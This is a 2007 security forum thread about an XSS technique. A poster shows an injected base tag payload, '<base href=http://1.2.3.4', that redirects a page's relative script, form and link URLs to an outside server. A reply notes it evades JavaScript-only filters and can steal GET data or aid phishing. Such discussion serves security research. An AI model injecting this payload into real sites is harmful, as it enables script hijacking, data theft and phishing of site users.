Paid Advertising
SLA.CKERS.ORG
HA.CKERS SLACKING
Q and A for any cross site scripting information. Feel free to ask away.
Base tag
Posted by: Grendel (IP Logged)
Date: August 17, 2007 11:37AM
I'm curious if anyone has seen a XSS attack using the base tag. If you can inject something like this
<base href=http://1.2.3.4
into a page before some useful tags, relative URLs will be redirected to the server of your choice. Most tags with href or src attributes are affected: a, script, frame, form (action attribute), link, img, etc.
IE7 only allows the base tag in the head section, so it would be less likely to work there. Older version of IE and current versions of FF have no problem with base tags in the body.
<base href=http://1.2.3.4
into a page before some useful tags, relative URLs will be redirected to the server of your choice. Most tags with href or src attributes are affected: a, script, frame, form (action attribute), link, img, etc.
IE7 only allows the base tag in the head section, so it would be less likely to work there. Older version of IE and current versions of FF have no problem with base tags in the body.
Re: Base tag
Posted by: DoctorDan (IP Logged)
Date: August 19, 2007 12:13PM
Actually this is a pretty good point. It would bypass any filter looking only for JS. All the GET variables can be stolen, and it could be used to trick someone into clicking a link to a phishing site.
-Dan
-Dan
Sorry, only registered users may post in this forum.
sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle.
SecTheory Security Consulting *